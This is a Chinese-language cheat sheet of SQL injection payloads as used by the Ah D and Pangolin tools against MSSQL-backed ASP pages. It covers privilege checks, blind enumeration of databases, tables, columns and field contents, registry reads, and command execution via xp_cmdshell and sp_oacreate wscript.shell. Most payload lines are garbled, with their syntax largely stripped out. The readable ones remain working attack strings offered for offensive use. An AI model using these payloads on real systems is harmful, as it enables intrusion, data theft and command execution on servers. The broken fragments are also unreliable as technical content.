啊D注入工具中使用的SQL注入语句

爆user
))   )= | *****
?Id)) 

 : ?Id

:   Id
检查SA权限：))))

爆当前库： )) --

检查是否为mssql数据库：and exists (select * from sysobjects)
(*%20from%20sysobjects)

判断表名：
panolin： ?Id
  admin也可以编码：%6E

啊D：?Id([admin])

爆列名：
啊D：([admin]) 

panolin：    

判断记录数：
  ()
判断admin表中有几个记录 如: cstr() 转换成字符型就是"" 那么他的长度就是2，所以这里

阿D： ()) 判断在0-9999之间，这句是判断在0-8之间

(,))))
记录数的第一位 也就是0
(,))))
记录数的第二位 也就是1  所以

猜字段长度：
Article.asp?Id((())  第一条记录的字段长度
                                                                                                                   第一条
Article.asp?Id((())  第二条记录的字段
                                                                                                                    第二条
阿D：
       Article.asp?Id(( 判断第一条记录的字段长度0-32之间
                                                                                        第二条
       Article.asp?Id(( 判断第二条记录的字段长度0-32之间
两个top  保留一个top  ,改另外一个成top x 就可以猜第x个字段长度 或改最后一个top (pangolin就是改最后一个top来爆第N杀记录的长度)

猜字段内容：
(,)))(()) 第一条记录、第一位的asc码
(,)))(()) 第19位的asc码

阿D：
(,))( 第一条记录、第7位的asc码在30~80之间
                                                                                              第一条
                                                                                               第二条
(,))( 第二条记录、第7位的asc码在30~80之间

猜中文：
    (,)))) 第一个列的内容是不是》
(,)))) 第二个列是不是》

检查数据库中有多少个库：)) ))) ) )

爆第一个库：  ))  )   --

爆第N个库： )) )   --

爆有多少个列名：))))  id )))))))))

爆列名： ))   id ))))))))  --

读注册表:
))--

) ',@result);--

)) )))  --

执行CMD

),ID ,)) insert D99_CMD exec master.dbo.xp_cmdshell 'dir c:\'--

)))) --

执行WSCRIPT:

DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [cmd.exe /c dir c:\] --

恢复XP_CMDSHELL

;exec master..sp_dropextendedproc 'xp_cmdshell'--